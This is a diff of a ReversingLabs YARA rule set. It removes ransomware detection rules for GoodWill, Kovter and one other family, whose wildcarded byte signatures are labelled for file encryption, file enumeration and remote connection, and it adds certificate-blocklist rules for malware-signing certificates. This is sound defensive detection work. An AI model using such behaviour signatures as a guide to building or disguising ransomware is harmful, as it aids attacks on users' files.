-            ?? ?? ?? 8B 75 ?? 8B C6 0F 43 0D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 55 ?? 2B C2 53 51
-            3B D8 77 ?? 8D 04 1A 83 FE ?? 89 45 ?? 8D 45 ?? 0F 43 45 ?? 8D 34 10 56 E8 ?? ?? ??
-            ?? 83 C4 ?? C6 04 33 ?? EB ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 53 E8
-            ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B 45 ?? 0F 43
-            D3 8B 75 ?? 2B C6 8B 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04 0E 89 45 ??
-            8D 45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 04 06 ??
-            EB ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8B 9D ?? ??
-            ?? ?? 83 3D ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 8B
-        }
-		$remote_connection_p4 = {
-            45 ?? 8B 75 ?? 2B C6 89 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04 0E 89 45
-            ?? 8D 45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 04 30
-            ?? EB ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8B 95 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B D0 83 78 ?? ?? 72 ?? 8B 10
-            8B 48 ?? 8B 45 ?? 8B 75 ?? 2B C6 89 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D
-            04 0E 89 45 ?? 8D 45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4
-            ?? C6 04 30 ?? EB ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ??
-            ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ??
-            ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76 ?? FF 15 ?? ?? ?? ?? 52
-            51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? BA ?? ?? ?? ?? 83 3D
-            ?? ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 8B 45 ?? 8B 75 ?? 2B C6 89 8D
-            ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04 0E 89 45 ?? 8D 45 ?? 0F 43 45 ?? 03
-            F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 04 30 ?? EB ?? C6 85 ?? ?? ?? ??
-            ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 55 ?? 8B 4D ?? 0F 43
-            55 ?? 8B 45 ?? 8B 75 ?? 2B C6 89 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04
-            0E 89 45 ?? 8D 45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ??
-            C6 04 30 ?? EB ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ??
-            83 3D ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 8B 45 ??
-            8B 75 ?? 2B C6 89 8D ?? ?? ?? ?? 51 52 3B C8 77 ?? 83 7D ?? ?? 8D 04 31 89 45 ?? 8D
-        }
-		$remote_connection_p5 = {
-            45 ?? 0F 43 45 ?? 03 F0 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 04 30 ?? EB
-            ?? C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ??
-            ?? 85 F6 74 ?? 8B 45 ?? 8D 4D ?? 83 7D ?? ?? 6A ?? 0F 43 4D ?? 50 50 51 6A ?? FF B5
-            ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ??
-            ?? ?? ?? 51 68 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 F6 8B 35 ??
-            ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 50 FF D6 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 50 FF D6 8B
-            85 ?? ?? ?? ?? 85 C0 74 ?? 50 FF D6 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA
-            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            C6 45 ?? ?? 83 F8 ?? 72 ?? 8D 48 ?? 8B C3 81 F9 ?? ?? ?? ?? 72 ?? 8B 5B ?? 83 C1 ??
-            2B C3 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 51 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ??
-            ?? ?? 83 F8 ?? 72 ?? 8D 48 ?? 8B C7 81 F9 ?? ?? ?? ?? 72 ?? 8B 7F ?? 83 C1 ?? 2B C7
-        }
-		$remote_connection_p6 = {
-            83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 51 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ??
-            72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83
-            F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55
-            ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ??
-            0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 33 C0 C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 4D ??
-            42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52
-            51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ??
-            ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76 ?? FF 15 ?? ?? ?? ?? 52
-            51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD
-            E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files_p1 = {
-            FF 15 ?? ?? ?? ?? 83 7D ?? ?? 8D 55 ?? 8B 4D ?? 0F 43 55 ?? 03 CA 89 85 ?? ?? ?? ??
-            83 7D ?? ?? 8D 45 ?? 51 0F 43 45 ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83
-            7F ?? ?? 72 ?? 8B 3F 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ??
-            ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76
-            ?? FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? 83 7D ?? ?? 8D 4D ?? 66 89 85 ?? ?? ?? ?? 0F 43 4D ?? 8B 45 ?? 03 C1 C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 0F 43 4D ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B F0 83 7E ?? ?? 72 ?? 8B 36 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ??
-            ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83
-            C0 ?? 83 F8 ?? 76 ?? FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 50 6A ?? 68 ?? ?? ?? ?? 57 8B 3D ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? FF D7 89 85 ?? ?? ?? ?? 83
-            F8 ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 FF
-            D7 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C9 BA
-        }
-		$encrypt_files_p2 = {
-            8D 40 ?? F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? BA ?? ??
-            ?? ?? 8B 0D ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 03 CA 89 85 ?? ?? ?? ?? 83 3D ?? ?? ??
-            ?? ?? B8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 0F 43 05 ?? ?? ?? ?? 51 50 8B CE E8 ?? ?? ??
-            ?? A1 ?? ?? ?? ?? 83 C4 ?? 33 C9 68 ?? ?? ?? ?? 6A ?? 56 66 89 0C 46 8D 85 ?? ?? ??
-            ?? 51 50 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? FF B5 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42
-            8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ??
-            ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83
-            C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 0F 82 ?? ?? ?? ?? 8B 4D ?? 42
-            8B C1 81 FA ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ??
-            0F 86 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ??
-            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ??
-            8D 45 ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 FF 33 F6 57 FF B5 ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 57 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84
-        }
-		$encrypt_files_p3 = {
-            8B 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 03 F8 8D 85 ?? ?? ?? ?? 3B
-            BD ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 0F 44 F1 50 6A ?? 56 6A ?? FF B5 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50
-            FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74
-            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ??
-            ?? 6A ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            B9 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF
-            B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ??
-            ?? 8B 35 ?? ?? ?? ?? FF D6 FF B5 ?? ?? ?? ?? FF D6 C6 85 ?? ?? ?? ?? ?? E9 ?? ?? ??
-            ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8A 85 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59
-            5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$find_files = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F9 89 BD ?? ?? ?? ?? 33 C0 89
-            85 ?? ?? ?? ?? 38 47 ?? 0F 85 ?? ?? ?? ?? 8B 07 8B 08 8D 85 ?? ?? ?? ?? 50 8D 49 ??
-            E8 ?? ?? ?? ?? 83 38 ?? 0F 85 ?? ?? ?? ?? 83 7F ?? ?? 74 ?? 8B 07 8B 08 8D 85 ?? ??
-            ?? ?? 50 8D 49 ?? E8 ?? ?? ?? ?? 83 38 ?? 0F 84 ?? ?? ?? ?? 8B 07 8D 8D ?? ?? ?? ??
-            8B 30 8D 46 ?? 50 E8 ?? ?? ?? ?? 8D 46 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ??
-            ?? 8B 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ??
-            ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 76
-            ?? FF 15 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 07 8B
-            30 8B 46 ?? 8B 00 85 C0 74 ?? 8D 8D ?? ?? ?? ?? 51 50 8D 85 ?? ?? ?? ?? 50 FF 15 ??
-            ?? ?? ?? 83 C4 ?? 66 83 38 ?? 75 ?? 8B 46 ?? FF 30 FF 15 ?? ?? ?? ?? 8B 46 ?? 83 C4
-            ?? C7 00 ?? ?? ?? ?? EB ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D
-            4E ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? C6 45 ?? ?? 81 7F ?? ?? ?? ?? ?? 8B 37 8B 36 75 ?? 68 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? 8B 46 ?? 89 85 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? C6 45 ?? ?? 6A ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 8D 85 ?? ?? ?? ?? 8D 4F ?? 50 E8
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, DIEGO MANUEL RODRIGUEZ" and pe.signatures [ i ] . serial == "2c:84:f9:13:60:59:e9:61:34:f8:76:66:70:ea:cd:52" and 1442215311 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Goodwill : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6716A9C195987D5Cfe53A094779461E7 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects GoodWill ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "66358802-450b-5276-8088-b3550519b1e8"
-		date = "2022-06-28"
-		modified = "2022-06-28"
+		id = "fbd05f8b-3289-565c-a5f4-a1514d06ae37"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.GoodWill.yara#L1-L89"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13330-L13346"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "94e2950f415ba737fe5ca9d32a3d850dd5744e547c4ca094ad28545e19033cb2"
+		logic_hash = "648fd70432a791b3e589f5eda1b1510045b465623914a9762ff3dfb4a3e022f8"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "GoodWill"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_file = {
-            02 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 06 6F
-            ?? ?? ?? ?? 0A 06 28 ?? ?? ?? ?? 0B 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 02 72 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 07 28 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? DE ?? 26 72 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 2A
-        }
-		$aes_encrypt = {
-            14 0A 03 0B 73 ?? ?? ?? ?? 0C 73 ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 07 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ??
-            ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 09 17 6F ?? ?? ?? ?? 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ??
-            11 ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ??
-            ?? ?? ?? DC 08 6F ?? ?? ?? ?? 0A DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? DC 08 2C ?? 08 6F ??
-            ?? ?? ?? DC 06 2A
-        }
-		$find_files_p1 = {
-            28 ?? ?? ?? ?? 0A 1F ?? 28 ?? ?? ?? ?? 0B 18 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25
-            17 72 ?? ?? ?? ?? A2 0C 06 0D 16 13 ?? 38 ?? ?? ?? ?? 09 11 ?? 9A 13 ?? 11 ?? 6F ?? ??
-            ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? DD ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11
-            ?? 28 ?? ?? ?? ?? 08 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 28 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 17 28 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 7D ?? ??
-            ?? ?? 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 19 6F ?? ?? ?? ?? 6F ??
-            ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ??
-            ?? DC DE ?? 26 DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ??
-            ?? ?? ?? DC 11 ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 73 ?? ?? ?? ?? 13 ??
-            11 ?? 11 ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ??
-            ?? ?? ?? 25 19 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ??
-            DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ??
-            8E 69 3F ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 09 8E 69 3F ?? ?? ?? ?? 08
-        }
-		$find_files_p2 = {
-            13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 07 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13
-            ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 17 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ??
-            2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 11 ?? FE 06 ?? ??
-            ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 19 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ??
-            26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC DE ?? 26
-            DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 07 11 ?? 28
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ??
-            7D ?? ?? ?? ?? 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 19 6F ?? ?? ??
-            ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F
-            ?? ?? ?? ?? DC DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 2A
-        }
-		$remote_connection = {
-            73 ?? ?? ?? ?? 0A 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 17 28 ?? ?? ??
-            ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 1C 6F ?? ?? ?? ?? 2B ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ??
-            1C 6F ?? ?? ?? ?? 06 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 17 0B DE ?? 26 72 ?? ?? ?? ??
-            28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 07 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_file ) and ( $aes_encrypt ) and ( $remote_connection )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Inter Technologies Ltd." and pe.signatures [ i ] . serial == "67:16:a9:c1:95:98:7d:5c:fe:53:a0:94:77:94:61:e7" and 1169424000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Kovter : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_876C00Bd665Df98B35554F67A5C1C32A : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Kovter ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9362ac5a-0b6c-5ac5-ac2b-59dcc1191dc6"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "830af0ac-fb01-5c6a-a7a3-2cf5c9d016fc"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Kovter.yara#L1-L141"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13348-L13366"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3082e036b54a73ce8397cfa6e8dc2a807c587d9f17286e75af6cdbe622fae1e1"
+		logic_hash = "90bde1313db78d4166e8c87e7e4111c576880922b1c983f3a842ea030d38a0da"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
